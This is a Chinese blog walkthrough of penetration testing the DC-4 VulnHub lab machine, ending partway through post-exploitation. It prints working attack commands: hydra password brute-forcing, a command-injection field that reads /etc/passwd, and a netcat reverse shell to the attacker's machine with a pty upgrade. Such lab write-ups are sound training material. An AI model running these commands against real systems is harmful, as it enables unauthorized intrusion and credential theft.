IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> DC-4 靶机的渗透学习 -> 正文阅读

[网络协议]DC-4 靶机的渗透学习

0X00 靶机的环境搭配

攻击机(Kali):?192.168

靶机(DC-1):?192.168

靶机地址:??DC: 4 ~ VulnHub

0X01信息收集

一、IP扫描

┌──(root?kali)-[~]
└─# arp-scan -l

二、端口扫描

┌──(root?kali)-[~]
└─# nmap -T4 -sV -O -A -p- 192.168.238.136

三、网站目录扫描

┌──(root?kali)-[~]
└─# dirb http://192.168.238.136? ?#无有用信息?

四、查看网站结构

发现用户名为admin和反向代理nginx

可以尝试暴力破解

0X02 爆破账户名密码

一、burp暴力破解

1.1 抓包

使用 burpsuite 抓包,右键 选择 “send to intruder

1.2 配置选项

进行密码爆破,右键 选择 “send to intruder

设置攻击类型为:"sniper?" ;在密码处添加位置

有效载荷-payload选项-导入字典

通常字典在 /usr/share/john/password.lst

?

?得到账户名和密码admin和happy

二、使用hydra爆破密码

┌──(root?kali)-[/usr/share/john]
└─# hydra -l admin -P /usr/share/john/password.lst 192.168.238.136 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f

参数名参数含义
-l指定单个用户名,适合在知道用户名爆破时使用
-L??指定多个用户名,参数值为存储用户名的文件的路径(建议使用文件绝对路径)
-p指定单个密码,适合在知道用户密码进行爆破时使用
-P?指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议使用文件绝对路径)
-C当用户名和密码存储到一个文件时使用此参数。注意:文件(字典)存储的格式必须为 “用户名:密码” 的格式
-M??指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议使用文件绝对路径)。注意:列表文件存储格式必须为 “地址:端口”
-t指定爆破时的任务数量(可以理解为线程数),默认为16
-S指定爆破时使用 SSL 链接
-R?继续从上一次爆破进度上继续爆破
-V显示爆破的详细信息
-f一旦爆破成功一个就立即停止爆破
server?代表要攻击的目标(单个),多个目标时请使用 -M 参数

0X03??

一、登陆用户

登陆发现可以执行部分命令

二、用户搜索

方法一、包含查询

2.1-1 查看用户

退出去重新抓包,

右键选择?send to Repeater

修改最后一行 radio=cat+/etc/passwd&submit=Run

?点击Go,发现有三个普通用户:charles、jim、sam和他们的目录

2.1-2?charles目录

查看charles用户家目录,没有发现有价值的内容

2.1-3?sam目录

查看sam用户家目录,也没有发现有价值的内容

2.1-4 jim目录

查看jim用户的家目录,发现一个test.sh脚本先略过,一个mbox文件,一个backus目录

进入backups目录,发现一个old-passwords.bak备份文件,打开查看发现一堆备份的密码,将密码保存

方法二、交互shell

2.2-1 反弹shell的制作

?┌──(root?kali)-[/usr/share/john]
└─# nc -lvp 1234? ?#靶机监听1234端口
listening on [any] 1234 ...

burp修改命令为
nc 192.168.238.130 1234?-e /bin/bash

2.2-2 交互式shell

┌──(root?kali)-[/usr/share/john]
└─# nc -lvp 1234
listening on [any] 1234 ...
192.168.238.136: inverse host lookup failed: Unknown host
connect to [192.168.238.130] from (UNKNOWN) [192.168.238.136] 48496

python -c 'import pty;pty.spawn("/bin/bash")'??

#这是交互shell,避免我们因为退出而导致需要重新或许使用nc反弹shell

2.2-3?

先后进入home?目录,jim目录,backups目录

cd? home

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-05-18 17:59:21  更:2022-05-18 18:00:47 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:29:56-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码